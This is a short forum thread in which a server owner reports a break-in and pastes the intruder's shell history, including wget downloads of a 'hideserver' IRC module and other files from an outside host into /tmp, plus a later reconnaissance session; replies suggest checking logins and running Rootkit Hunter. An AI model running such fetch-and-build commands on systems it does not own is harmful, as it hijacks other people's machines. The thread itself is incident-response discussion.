Anybody hacked my PC?

Talk about pretty much anything here, but DO NOT USE FOR SUPPORT.

Moderator: Supporters

Locked
Darkness
Posts: 2
Joined: Fri Sep 10, 2010 9:33 am

Anybody hacked my PC?

Post by Darkness »

Hi,

I need help about this topic. Hope anybody can tell me something!

I noticed this morning that my root password has changed. After recovering it, I saw a new user in my server called "c". This is what i found in bash_history of that user:
cd /tmp
wget http://www.unrealircd.com/downloads/Unr ... 8.1.tar.gz
tar -zxvf Unreal3.2.8.1.tar.gz
ls
rm -fr Unreal3.2.8.1.tar.gz
cd Unreal3.2
./Config
make
cd src/modules
wget http://unknown.me.uk/hideserver.c
wget http://unknown.me.uk/hideserver.so
cd ..
cd ..
make custommodule MODULEFILE=hideserver
wget http://unknown.me.uk/ircd.motd
wget http://unknown.me.uk/antirandom.tar.gz
tar zxvf antirandom.tar.gz
pwd
cd AntiRandom-1.1
./build
cd ..
./unreal start
exit
Does anyone know what this is?

I found nothing in bash_history of the root user. I suppose he deleted it.


Thanks !!!
katsklaw
Posts: 1124
Joined: Sun Apr 18, 2004 5:06 pm
Contact:

Re: Anybody hacked my PC?

Post by katsklaw »

sounds hacked to me.

You can do last c as root and see when and from what IP they connected from. Please bear in mind that if you were hacked, the hacker would be stupid if he didn't bounce to your box and the IP is most likely not his/her real one but you'll have an idea of when it happened.
Darkness
Posts: 2
Joined: Fri Sep 10, 2010 9:33 am

Re: Anybody hacked my PC?

Post by Darkness »

No doubt. It was hacked.

He reconnected about one hour ago, this is what he tried:
w
lastlog
suid
id
uname 0a
uname -a
lastlog
cd /tmp
ls
cd .,
ls -a
exit
I had deleted his changes at /tmp before, so he exited. I have just changed password of "c".

Now I have to try to recover system status and delete the rootkits that he installed to get the password (need help for that). I posted this in another forum (Spanish): http://www.espaciolinux.com/foros/post2 ... ml#p238645 I will translate it here later.

Ahp, His IP:
c pts/0 173-203-192-173. Fri Sep 10 15:26 - 15:27 (00:00)


Thanks a lot!!
katsklaw
Posts: 1124
Joined: Sun Apr 18, 2004 5:06 pm
Contact:

Re: Anybody hacked my PC?

Post by katsklaw »

I suggest rootkit hunter found at http://www.rootkit.nl/
Locked